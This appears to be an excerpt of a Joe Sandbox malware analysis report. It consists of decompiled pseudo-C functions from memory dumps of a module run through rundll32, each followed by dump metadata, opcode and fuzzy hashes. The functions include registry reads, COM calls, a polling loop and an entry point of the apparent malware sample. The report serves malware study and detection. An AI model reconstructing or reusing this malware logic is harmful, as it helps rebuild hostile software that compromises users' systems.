                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t18 = 0;
                                                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 3fa85261eca86865f0f44b96b26a4b694a5b568eb9b862701ac6ccc8214b2361
                                                                                                                                                                                                                                    • Instruction ID: 1d3c06a4cde04579819f8a46efa171535485e62e31e0cb86891a5373c16356d8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fa85261eca86865f0f44b96b26a4b694a5b568eb9b862701ac6ccc8214b2361
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8501B576200204AAFB00EFE6DC80BBA76ABEB45376F540475B945D6050D67ABD41A660
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E04C3A72D(intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                    				intOrPtr _t12;
                                                                                                                                                                                                                                    				intOrPtr _t14;
                                                                                                                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                                                                                                                    				intOrPtr* _t19;
                                                                                                                                                                                                                                    				intOrPtr _t25;
                                                                                                                                                                                                                                    				intOrPtr _t27;
                                                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t28 = E04C32049(_t9, 8);
                                                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                                                    					_t11 = 8;
                                                                                                                                                                                                                                    					return _t11;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t12 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    				_t2 = _t12 + 0x4c3e1bc; // 0x6f0072
                                                                                                                                                                                                                                    				_t14 = E04C37B5D(_t2, _a4, _t28); // executed
                                                                                                                                                                                                                                    				_t27 = _t14;
                                                                                                                                                                                                                                    				if(_t27 < 0) {
                                                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                                                    					E04C39039(_t14, _t28);
                                                                                                                                                                                                                                    					return _t27;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t17 =  *_t28;
                                                                                                                                                                                                                                    				_t3 = _t28 + 4; // 0x4
                                                                                                                                                                                                                                    				_t25 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    				_t4 = _t25 + 0x4c3e1fc; // 0x740053
                                                                                                                                                                                                                                    				_t27 =  *((intOrPtr*)( *_t17 + 0x18))(_t17, _t4, 0, 0, _t3, 0);
                                                                                                                                                                                                                                    				if(_t27 < 0) {
                                                                                                                                                                                                                                    					_t19 =  *_t28;
                                                                                                                                                                                                                                    					 *((intOrPtr*)( *_t19 + 8))(_t19);
                                                                                                                                                                                                                                    					_t14 = _a4;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t14 = 0;
                                                                                                                                                                                                                                    					 *_a8 = _t28;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_t27 < 0) {
                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t14;
                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
• Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
• Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
• Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 3264021b966b64a987efe5c265611a528fa56f7a1cd22b5f0d963550374fbad5
                                                                                                                                                                                                                                    • Instruction ID: 3da817bd419a41e300841efdc0ddb340e172e7227a7911bece42d739b7163fdd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3264021b966b64a987efe5c265611a528fa56f7a1cd22b5f0d963550374fbad5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9001C479200604ABD711DB69C880F5677BAEFCA756F108418B548CF240DA72EC01DBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 34%
                                                                                                                                                                                                                                    			E04C39318(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				void* _v18;
                                                                                                                                                                                                                                    				short _v20;
                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                    				short _t17;
                                                                                                                                                                                                                                    				intOrPtr _t19;
                                                                                                                                                                                                                                    				short _t23;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t23 = 0;
                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosw");
                                                                                                                                                                                                                                    				_t15 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    				_t4 = _t15 + 0x4c3e39c; // 0x56a8944
                                                                                                                                                                                                                                    				_t20 = _t4;
                                                                                                                                                                                                                                    				_t6 = _t15 + 0x4c3e124; // 0x650047
                                                                                                                                                                                                                                    				_t17 = E04C39152(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                                                                                                                                                                                                    				if(_t17 < 0) {
                                                                                                                                                                                                                                    					_t23 = _t17;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					if(_v20 != 8) {
                                                                                                                                                                                                                                    						_t23 = 1;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t19 = E04C39FC9(_t17, _t20, _v12);
                                                                                                                                                                                                                                    						if(_t19 == 0) {
                                                                                                                                                                                                                                    							_t23 = 8;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							 *_a16 = _t19;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__imp__#6(_v12);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t23;
                                                                                                                                                                                                                                    			}











Memory Dump Source
• Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
• Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
• Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
• Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6c0702a08201dfc5adfeac0b53abf58eac175d4cb3ece1e7fae7184504bfd717
• Instruction ID: f02f383c46fbd209967a8477116a149af61e2f6e2828978713b2e31af3f2585f
• Opcode Fuzzy Hash: 6c0702a08201dfc5adfeac0b53abf58eac175d4cb3ece1e7fae7184504bfd717
• Instruction Fuzzy Hash: 7901B1B2504019BFDF50AFA8CC449AEBBBAFB48741F004825F911E20B0E3B0ED5497D1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 41%
E04C389D6(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
	char _v12;
	void* _t15;
	void* _t20;
	void* _t23;
	signed short* _t24;

	_t23 = E04C3809F(0, _a12);
	if(_t23 == 0) {
		_t20 = 8;
	} else {
		_t24 = _t23 + _a16 * 2;
		*_t24 = *_t24 & 0x00000000; // executed
		_t15 = E04C3904E(__ecx, _a4, _a8, _t23); // executed
		_t20 = _t15;
		if(_t20 == 0) {
			__imp__( &_v12);
			_push( &_v12);
			*_t24 = 0x5f;
			_t20 = E04C3A635(__edx, 8, _a4, 0x80000001, _a8, _t23);
		}
		__imp__( *0x4c3d238, 0, _t23);
	}
	return _t20;
}









Memory Dump Source
• Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
• Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
• Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
• Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5d7fae165b6b0adbe2f3ce27130d252ec3531c1eff55408526b43cc5ceb4a8b9
• Instruction ID: 9fafc8439d229939063a0de7711171885ae4dcd76c1b6a62937cd933363ad593
• Opcode Fuzzy Hash: 5d7fae165b6b0adbe2f3ce27130d252ec3531c1eff55408526b43cc5ceb4a8b9
• Instruction Fuzzy Hash: C1018F36200209BBEF216FA4DC44F9A7BBAFF84309F004425FA009A150EBB6E9649760
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 58%
E04C31262(intOrPtr* __esi, intOrPtr _a4, unsigned int _a8, char _a12) {
	signed short _t18;
	intOrPtr _t23;
	signed int _t25;
	signed short _t26;

	if(_a4 != 0) {
		_t18 = E04C39318(_a4, _a8, _a12, __esi); // executed
		_t26 = _t18;
	} else {
		_t26 = E04C36BFA(0, 0x80000002, _a8, _a12, &_a12, &_a8);
		if(_t26 == 0) {
			_t25 = _a8 >> 1;
			if(_t25 == 0) {
				_t26 = 2;
				__imp__( *0x4c3d238, 0, _a12);
			} else {
				_t23 = _a12;
				*(_t23 + _t25 * 2 - 2) = *(_t23 + _t25 * 2 - 2) & _t26;
				*__esi = _t23;
			}
		}
	}
	return _t26;
}








                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 881150ed841d8acb28686bf5f8f38b52e2981c94c655aca85a21731b77a46e46
                                                                                                                                                                                                                                    • Instruction ID: 75498ca21332d178e5999bbf3c4f21a91460ee22c9c728d1fbd7f3fafc9ce762
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 881150ed841d8acb28686bf5f8f38b52e2981c94c655aca85a21731b77a46e46
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58011236100249FFDB11DF44CC01FBE3BB6EB44352F188429FA159A160DB71E521DB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E04C354BC(void* __ecx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                                                    				intOrPtr* _t23;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t23 = __imp__; // 0x76d24a00
                                                                                                                                                                                                                                    				_t20 = 0;
                                                                                                                                                                                                                                    				_v8 = _v8 & 0;
                                                                                                                                                                                                                                    				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                                                                                                                                                                                                    				_t10 = _v8;
                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                    					_t20 = E04C32049(_t10 + 1, _t10 + 1);
                                                                                                                                                                                                                                    					if(_t20 != 0) {
                                                                                                                                                                                                                                    						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                                                                                                                                                                                                    						if(_t15 != 0) {
                                                                                                                                                                                                                                    							 *((char*)(_v8 + _t20)) = 0;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							E04C39039(_t15, _t20);
                                                                                                                                                                                                                                    							_t20 = 0;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t20;
                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0f67e6f018ab3a278427149f84df2e24a0e84f9545442a4bf3980e4140bd63f8
                                                                                                                                                                                                                                    • Instruction ID: 02cc1767ceabe43bbaf4506522e15683f0bbcb82dbe63b1938873c3e60093a16
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f67e6f018ab3a278427149f84df2e24a0e84f9545442a4bf3980e4140bd63f8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0AF05E76600149BAEB11D6AA9C40EEF76AFDBC5656F150069A905E3140EA70FF019770
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E04C396A4(void* __ecx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                    				intOrPtr _t14;
                                                                                                                                                                                                                                    				intOrPtr _t17;
                                                                                                                                                                                                                                    				intOrPtr _t18;
                                                                                                                                                                                                                                    				intOrPtr _t21;
                                                                                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t10 =  *0x4c3d270; // 0xd448b889
                                                                                                                                                                                                                                    				_v8 = _t10;
                                                                                                                                                                                                                                    				_v12 = _t10;
                                                                                                                                                                                                                                    				_t23 = 0; // executed
                                                                                                                                                                                                                                    				_t12 = E04C321CD(__ecx,  &_v12); // executed
                                                                                                                                                                                                                                    				if(_t12 != 0) {
                                                                                                                                                                                                                                    					_t14 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    					_t4 = _t14 + 0x4c3e796; // 0x74666f53
                                                                                                                                                                                                                                    					_t17 = E04C37A9A(_t4, 0);
                                                                                                                                                                                                                                    					 *0x4c3d33c = _t17;
                                                                                                                                                                                                                                    					if(_t17 != 0) {
                                                                                                                                                                                                                                    						_t18 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    						_v8 = _v8 ^ 0x738bb12a;
                                                                                                                                                                                                                                    						_t8 = _t18 + 0x4c3e862; // 0x61636f4c
                                                                                                                                                                                                                                    						_t21 = E04C37A9A(_t8, 1);
                                                                                                                                                                                                                                    						 *0x4c3d344 = _t21;
                                                                                                                                                                                                                                    						if(_t21 != 0) {
                                                                                                                                                                                                                                    							_t23 = 1;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t23;
                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
• Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
• Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
• Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0139f5e893da6a3698cb801f0e05ac8cd21df386c8cd501b836a8f4ce4a5b10e
                                                                                                                                                                                                                                    • Instruction ID: bd832aa519261c40106d56889c55850736870fd094121f86b0608dc765d69e43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0139f5e893da6a3698cb801f0e05ac8cd21df386c8cd501b836a8f4ce4a5b10e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F04FB9911119ABDB20DFB8D9849DE77FDEB09306F108063E502D7240E6B4EF04DB90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                                                                                                                    			E04C32436(intOrPtr* __edi) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                    				intOrPtr* _t19;
                                                                                                                                                                                                                                    				intOrPtr* _t22;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t22 = __edi;
                                                                                                                                                                                                                                    				_push( &_v12);
                                                                                                                                                                                                                                    				_push(__edi);
                                                                                                                                                                                                                                    				_v8 = 0x1d4c0;
                                                                                                                                                                                                                                    				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                                                                                                                                                                                                    				_t19 = __imp__; // 0x76d26490
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_v16 = _t15;
                                                                                                                                                                                                                                    					 *_t19(0x1f4); // executed
                                                                                                                                                                                                                                    					if(_v12 == 4) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_v8 == 0) {
                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                    						_t15 =  *((intOrPtr*)( *_t22 + 0xe0))(_t22,  &_v12);
                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(_v8 <= 0x1f4) {
                                                                                                                                                                                                                                    							_v16 = 0x80004004;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_v8 = _v8 - 0x1f4;
                                                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                    					return _v16;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
• Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
• Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
• Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 8f5bbc44f7c3d190012440b25a522ee525d29ab43d2b05e1fe32100347f173de
                                                                                                                                                                                                                                    • Instruction ID: c077cb2e74d004b45afec248507e157982e599a806eeea00d2a37484c3300cee
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f5bbc44f7c3d190012440b25a522ee525d29ab43d2b05e1fe32100347f173de
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDF04975D01219EFDF00DB98D488AEDB7B8EF04306F1480EAE502A7201E3B56B84CF61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                                                                                                                    			E04C324E1(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				void* _v18;
                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                    				intOrPtr _t14;
                                                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosw");
                                                                                                                                                                                                                                    				_v12 = _a16;
                                                                                                                                                                                                                                    				_t14 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    				_t5 = _t14 + 0x4c3e10c; // 0x56a86b4
                                                                                                                                                                                                                                    				_t7 = _t14 + 0x4c3e2a4; // 0x650053
                                                                                                                                                                                                                                    				_v20 = 3;
                                                                                                                                                                                                                                    				_t16 = E04C39152(_t5, _a4, 0x80000001, _a8, _t7, _a12, _t5,  &_v20); // executed
                                                                                                                                                                                                                                    				return _t16;
                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 6a0eab493905bee29f00d26a6b8b9e3130b31e3f367543f284f1fffeea5421bf
                                                                                                                                                                                                                                    • Instruction ID: 36fc8b55db0c4b338c47358043cb50035e8671347f461f19c7e448ff76c177b9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a0eab493905bee29f00d26a6b8b9e3130b31e3f367543f284f1fffeea5421bf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F01C76400109BEDF01DFA8C844CEAB7B9FB08304F018525FA05A6121E771EA159B91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			_entry_(intOrPtr _a8) {
                                                                                                                                                                                                                                    				intOrPtr _v0;
                                                                                                                                                                                                                                    				intOrPtr _t4;
                                                                                                                                                                                                                                    				intOrPtr _t7;
                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t12 = 1;
                                                                                                                                                                                                                                    				_t4 = _a8;
                                                                                                                                                                                                                                    				if(_t4 == 0) {
                                                                                                                                                                                                                                    					__imp__(0x4c3d23c);
                                                                                                                                                                                                                                    					if(_t4 == 0) {
                                                                                                                                                                                                                                    						E04C3970F();
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t7 = _t4 - 1;
                                                                                                                                                                                                                                    					if(_t7 == 0) {
                                                                                                                                                                                                                                    						__imp__(0x4c3d23c);
                                                                                                                                                                                                                                    						if(_t7 == 1) {
                                                                                                                                                                                                                                    							_t8 = E04C36A56(_t7, _t9, _t10, _v0); // executed
                                                                                                                                                                                                                                    							if(_t8 != 0) {
                                                                                                                                                                                                                                    								_t12 = 0;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t12;
                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: f42a001c4a39909645b9edc32546d021d1fdf6ef9813f6d4bd8ddd292230c587
                                                                                                                                                                                                                                    • Instruction ID: 4a04ccb88ba5bda2151f7304943a8210bcb27564e2d8e12b66644726c4474a96
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f42a001c4a39909645b9edc32546d021d1fdf6ef9813f6d4bd8ddd292230c587
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAE0867A3442215797357FB49844B6EA6D3AF01B87F054424F6C5D4070D660FD509EF1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E04C3904E(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_v8 = 1;
                                                                                                                                                                                                                                    				if(_a4 == 0) {
                                                                                                                                                                                                                                    					return E04C36B01(0x80000001, 4, _a8, _a12,  &_v8, 4);
                                                                                                                                                                                                                                    				}
